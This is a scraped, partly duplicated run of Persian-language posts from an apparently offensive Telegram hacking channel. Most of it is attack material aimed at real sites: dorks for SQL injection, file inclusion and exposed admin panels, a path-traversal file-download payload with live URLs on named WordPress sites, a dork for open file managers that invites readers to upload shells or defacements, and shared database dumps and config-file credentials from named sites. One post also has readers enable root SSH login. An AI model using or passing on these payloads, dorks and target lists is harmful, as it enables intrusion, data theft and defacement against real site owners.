✔️ #نصب سرویس ssh در کالی لینوکس و استفاده از آن به صورت لوکال در شبکه
Type in Terminal:
-> نصب سرویس :
apt-get install openssh-server
================================
-> نصب سرویس کلاینت :
apt-get install openssh-client
================================
-> استارت سرویس:
service ssh start
================================
-> رفتن به پوشه ssh
cd /etc/ssh
================================
-> ویرایش فایل کانفیگ با ویرایشگر متنی :
nano sshd_config
================================
-> این خط را پیدا کنید و پاکش کنید :
PermitRootLogin without-password
================================
-> سپس این متن رو به جای متن قبلی بنویسد :
PermitRootLogin yes
================================
-> سیو کردن :
ctrl + x = y = enter
================================
-> سرویس را ریستارت کنید :
service ssh restart
================================
-> ایپی سیستم خود را پیدا کنید :
ifconfig
================================
-> سپس درون شبکه خود (برای مثال کلاینت ویندوزی) نرم افزار PuTTY رو نصب کنید و با ایپی سرور که به دست اوردین لاگین کنید.
@LearnExploit
Type in Terminal:
-> نصب سرویس :
apt-get install openssh-server
================================
-> نصب سرویس کلاینت :
apt-get install openssh-client
================================
-> استارت سرویس:
service ssh start
================================
-> رفتن به پوشه ssh
cd /etc/ssh
================================
-> ویرایش فایل کانفیگ با ویرایشگر متنی :
nano sshd_config
================================
-> این خط را پیدا کنید و پاکش کنید :
PermitRootLogin without-password
================================
-> سپس این متن رو به جای متن قبلی بنویسد :
PermitRootLogin yes
================================
-> سیو کردن :
ctrl + x = y = enter
================================
-> سرویس را ریستارت کنید :
service ssh restart
================================
-> ایپی سیستم خود را پیدا کنید :
ifconfig
================================
-> سپس درون شبکه خود (برای مثال کلاینت ویندوزی) نرم افزار PuTTY رو نصب کنید و با ایپی سرور که به دست اوردین لاگین کنید.
@LearnExploit
❤1👍1
✔️ چند نمونه دورک برای انواع #اسیب_پذیری تحت وب
-> باگ sql
inurl:details.php?id= [SQL Injection]
-> باگ lfi
inurl:download.php?file= [File Inclusion]
-> باگ اپلود فایل
inurl:files/upload.php [File Upload]
-> باگ بایپس پنل ادمین
inurl:admin/login.php [Authentication Bypass]
-> باگ خواندن کانفیگ
inurl:ftp.cfg | intext:md5pwd:
@LearnExploit
-> باگ sql
inurl:details.php?id= [SQL Injection]
-> باگ lfi
inurl:download.php?file= [File Inclusion]
-> باگ اپلود فایل
inurl:files/upload.php [File Upload]
-> باگ بایپس پنل ادمین
inurl:admin/login.php [Authentication Bypass]
-> باگ خواندن کانفیگ
inurl:ftp.cfg | intext:md5pwd:
@LearnExploit
❤1
✔️ ساعاتی پیش #اکسپلویت آسیب پذیری از نوع DoS برای نرم افزار و اسکنر معروف Acunetix WVS منتشر شد.
🌐 exploit-db.com/exploits/45186/
@LearnExploit
🌐 exploit-db.com/exploits/45186/
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
اموزش نحوه ی اسیب پذیری sql در پنل ادمین #Leraning #sqli in #admin panel —— t.me.learnexploit 0Day.Todat
سلام دوستان ببخشید چند وقتی نبودم...
=
اموزش نحوه ی اسیب پذیری sql در پنل ادمین
#Leraning #sqli in #admin panel
=
در این اموزش یاد میگیری که :
1 - نحوه پبدا کردن اسیب پذیری در پنل ادمین
2 - تحلیل کد php ان
3 - نحوه ی نفوذ
4 - نحوه ی رفع (patch) باگ
=
dl link : yon.ir/UPal2
video in worklearning : yon.ir/zO6yH
————-
t.me/learnexploit
=
اموزش نحوه ی اسیب پذیری sql در پنل ادمین
#Leraning #sqli in #admin panel
=
در این اموزش یاد میگیری که :
1 - نحوه پبدا کردن اسیب پذیری در پنل ادمین
2 - تحلیل کد php ان
3 - نحوه ی نفوذ
4 - نحوه ی رفع (patch) باگ
=
dl link : yon.ir/UPal2
video in worklearning : yon.ir/zO6yH
————-
t.me/learnexploit
file.php
2.6 KB
تمام توضیحات در این فایل قرار دارد.
اسیب پذیری فایل دانلود در تم وردپرس
#Exploit - #Dork - #WP - #Theme
--------
#Title : UWordpress dreamsmiths Themes Arbitrary File Download
#Dorks :
1. inurl:/wp-content/themes/fiestaresidences/
2. inurl:wp-content/themes/hsv/
3. inurl:wp-content/themes/erinvale/
#P0c :
نحوه ی اکسپلویت یکی از اکسپلویت های زیر رو به URL تارگت خود اضافه کنید.
site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.php
site.com/wp-content/themes/optimus/download.php?file=../../../index.php
site.com/wp-content/themes/erinvale/download.php?file=../../../index.php
site.com/wp-content/themes/hsv/download.php?file=../../../index.php
#Sample:
https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php
/--//--//--//--//--//--//--//--/
T.me/LearnExploit
0Day.Today Boy's
#Exploit - #Dork - #WP - #Theme
--------
#Title : UWordpress dreamsmiths Themes Arbitrary File Download
#Dorks :
1. inurl:/wp-content/themes/fiestaresidences/
2. inurl:wp-content/themes/hsv/
3. inurl:wp-content/themes/erinvale/
#P0c :
نحوه ی اکسپلویت یکی از اکسپلویت های زیر رو به URL تارگت خود اضافه کنید.
site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.php
site.com/wp-content/themes/optimus/download.php?file=../../../index.php
site.com/wp-content/themes/erinvale/download.php?file=../../../index.php
site.com/wp-content/themes/hsv/download.php?file=../../../index.php
#Sample:
https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php
/--//--//--//--//--//--//--//--/
T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
#Dork - #filemanager #PhpSpy
———-
|-Dork :
"File Manager - Current disk free"
———-
|-POC :
با این دورک میتونید به فایل منیجر سایت ها دسترسی داشته باشید و
شل یا دیفس خودتونو اپلود کنید.
———-
|-Sample :
T.me/LearnExploit
0Day.Today Boy's
———-
|-Dork :
"File Manager - Current disk free"
———-
|-POC :
با این دورک میتونید به فایل منیجر سایت ها دسترسی داشته باشید و
شل یا دیفس خودتونو اپلود کنید.
———-
|-Sample :
http://sma.insanrabbany.sch.id/index.php/galeri/galeri-kegiatan/3-perpisahan-6/detail/12-perpisahan-6?tmpl=component
==========T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
دیتابیس سایت :
http://www.vc.blmco.com
#Target - #Database
==========
T.me/LearnExploit
0Day.Today Boy's
http://www.vc.blmco.com
#Target - #Database
==========
T.me/LearnExploit
0Day.Today Boy's
database.sql
116.8 KB
T.me/LearnExploit
0Day.Today Boy's
0Day.Today Boy's
watch148_watch.sql
2.7 MB
T.me/LearnExploit
0Day.Today Boy's
0Day.Today Boy's
دیتابیس سایت :
http://www.afilmdesign.com
#Target - #Database
==========
T.me/LearnExploit
0Day.Today Boy's
http://www.afilmdesign.com
#Target - #Database
==========
T.me/LearnExploit
0Day.Today Boy's
simpledata.sql
39.3 KB
T.me/LearnExploit
0Day.Today Boy's
0Day.Today Boy's
#Target - #Database
دیتابیس سایت :
http://www.nationalpoultryequipment.com/store/database/SQL%20Backups/
اینم میزارم به عهده ی خودتون :)
==========
T.me/LearnExploit
0Day.Today Boy's
دیتابیس سایت :
http://www.nationalpoultryequipment.com/store/database/SQL%20Backups/
اینم میزارم به عهده ی خودتون :)
==========
T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
#DoRk - #Wp_Config (.bak = backup file ) #file
——
> Dork :
inurl:wp-config.bak
——
> POC :
دوستان با این دورک میتونید به فایل backup وردپرس بعضی سایت ها دسترسی داشته باشید.
نحوه ی استفاده :
به دو دیتابیس توجه کنید :
define('DB_USER', '##');
define('DB_PASSWORD', '##');
——
> Like :
http://www.malwarehelp.org/blog/wp-config.bak
================
Our Is Here ( 0Day.Today Boy's :) )
@ L E A R N E X P L O I T - T.me/LearnExploit
——
> Dork :
inurl:wp-config.bak
——
> POC :
دوستان با این دورک میتونید به فایل backup وردپرس بعضی سایت ها دسترسی داشته باشید.
نحوه ی استفاده :
به دو دیتابیس توجه کنید :
define('DB_USER', '##');
define('DB_PASSWORD', '##');
——
> Like :
http://www.malwarehelp.org/blog/wp-config.bak
================
Our Is Here ( 0Day.Today Boy's :) )
@ L E A R N E X P L O I T - T.me/LearnExploit
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today